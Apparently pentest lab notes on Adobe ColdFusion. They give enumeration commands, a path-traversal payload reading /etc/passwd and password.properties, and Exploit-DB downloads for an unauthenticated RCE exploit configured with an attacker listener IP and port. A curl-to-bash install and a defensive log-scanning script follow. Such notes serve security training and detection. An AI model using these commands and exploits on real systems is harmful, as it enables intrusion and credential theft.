Theory
TCP Ports
| PORT | PROTOCOL | DESCRIPTION |
|---|---|---|
| 80 | HTTP | Web client and server communication |
| 443 | HTTPS | Encrypted Web client and server communication |
| 1935 | RPC | RPC client and server communication |
| 25 | SMTP | Simple Mail Transfer Protocol to send emails |
| 8500 | SSL | Used for server communication via SSL |
| 5500 | Server Monitor | Used for remote administration of the ColdFusion Server |
Discovery | Enumeration
Port Scanning
Nmap
```
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG <TARGET>.allPorts <TARGET>
nmap -p"$( grep -ioP --color -- '\s\d{1,5}(?=/open)' <TARGET>.allPorts | xargs | sed 's@\s@,@g' )" -sC -sV -v -n -Pn --disable-arp-ping -oN <TARGET>.targeted <TARGET>
```
Default Files
During the installation process, the COLDFUSION application creates several default files, such as →
```
<URL>/CFIDE/administrator/index.cfm
```
Fuzzing
COLDFUSION web applications typically use .CFM or .CFC file extensions. Therefore, we can try fuzzing for those extensions in the web root or in any previously discovered directory
Ffuf
```
ffuf -v -t 200 -w '<WORDLIST>' -e '.cfm,.cfc' -u '<URL>/FUZZ'
```
HTTP Headers
Like many other web technologies and applications, we can inspect the headers of the HTTP response
COLDFUSION typically sets specific headers, such as Server: Coldfusion or X-Powered-by: Coldfusion
```
curl --silent --location --request GET '<URL>' --head
```
Identifying Vulnerabilities
Searchsploit
```
searchsploit --www Adobe ColdFusion
```
Directory Path Traversal ( CVE-2010-2861 )
Affected Versions → 9.0.1 and lower
This vulnerability stems from the absence of input validation and sanitization when user input is passed to certain COLDFUSION tags, such as CFFile and CFDirectory
Vulnerable Code
index.cfm
```cfm
<cfdirectory directory="#ExpandPath('uploads/')#" name="fileList">
<cfloop query="fileList">
<a href="uploads/#fileList.name#">#fileList.name#</a><br>
</cfloop>
```
Payload
```
<URL>/index.cfm?directory=../../../etc&file=passwd
```
In this case, this security flaw exists in several endpoints, namely →
<URL>/CFIDE/administrator/settings/mappings.cfm
<URL>/logging/settings.cfm
<URL>/datasources/index.cfm
<URL>/j2eepackaging/editarchive.cfm
<URL>/CFIDE/administrator/enter.cfm
The vulnerable parameter is locale, so we can proceed as follows
Exploitation
ExploitDB
- Setup
Installing Python2.7
```
curl https://pyenv.run | bash
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"
pyenv install 2.7.18
```
- Creating a Virtual Environment
```
pyenv shell 2.7.18 && pip install virtualenv
virtualenv .venv
. .venv/bin/activate
```
- Downloading the exploit
```
curl --silent --location --request GET 'https://www.exploit-db.com/raw/14641' --output exploit.py
```
- Usage
```
python exploit.py 10.129.36.214 8500 ../../../../../../../lib/password.properties
```
Unauthenticated RCE ( CVE-2009-2265 )
Affected Versions → 8.0.1 and lower
This security flaw allows unauthenticated users to upload files and gain remote code execution on the target host
In this case, the vulnerability exists in the bundled FCKeditor rather than in the COLDFUSION core itself
That said, the vulnerable endpoint is the following →
```
<URL>/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=
```
ExploitDB
Setup
- Downloading the exploit
```
curl --silent --location --request GET 'https://www.exploit-db.com/raw/50057' --output exploit.py
```
- Modifying the exploit
We have to modify the following lines with the corresponding data
```python
...<SNIP>...
if __name__ == '__main__':
    # Define some information
    lhost = '10.10.15.63' # Attacker IP
    lport = 1234 # Attacker Port
    rhost = '10.129.36.124' # Target IP
    rport = 8500 # Target Coldfusion Port
...<SNIP>...
```
Usage
python3 exploit.py
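From the defender's side, the two flaws above leave recognisable traces in the web server access log: a `locale` value containing traversal sequences against the CFIDE endpoints listed for CVE-2010-2861, and `Command=FileUpload` requests to the FCKeditor connector named for CVE-2009-2265. The following Python check is an added example, not part of the original notes or of either exploit; the combined-format log lines are constructed, and paths are matched by suffix because the prefix below the web root varies between installs.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths the notes list for the CVE-2010-2861 locale traversal, matched as
# suffixes because the prefix below the web root varies between installs.
TRAVERSAL_PATHS = ("/CFIDE/administrator/settings/mappings.cfm", "/logging/settings.cfm",
                   "/datasources/index.cfm", "/j2eepackaging/editarchive.cfm",
                   "/CFIDE/administrator/enter.cfm")
# FCKeditor connector the notes name for CVE-2009-2265.
UPLOAD_PATH = "/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(line):
    """Return a finding for a suspicious request line, or None for benign ones."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    # parse_qs percent-decodes once; unquote again to catch double encoding
    params = {k.lower(): [unquote(v) for v in vals]
              for k, vals in parse_qs(parts.query, keep_blank_values=True).items()}
    if path.endswith(TRAVERSAL_PATHS):
        for value in params.get("locale", []):
            if ".." in value or value.endswith("password.properties"):
                return "CVE-2010-2861 traversal via locale=" + value
    if path.endswith(UPLOAD_PATH) and "fileupload" in [v.lower() for v in params.get("command", [])]:
        return "CVE-2009-2265 FCKeditor upload attempt (%s)" % m.group("method")
    return None


def scan(lines):
    """Return (line_no, finding) pairs for every suspicious line."""
    return [(no, f) for no, f in ((no, classify(l)) for no, l in enumerate(lines, 1)) if f]


# Constructed sample access log lines (combined format, not from a real host).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2F..%2F..%2F..%2F..%2Flib%2Fpassword.properties HTTP/1.1" 200 1337',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 88',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.cfm HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for no, finding in scan(SAMPLE_LOG):
        print("line %d: %s" % (no, finding))
```

Because the connector path is matched regardless of HTTP method and the `locale` value is decoded before inspection, the check also catches percent-encoded variants of the traversal rather than only the literal `../` form.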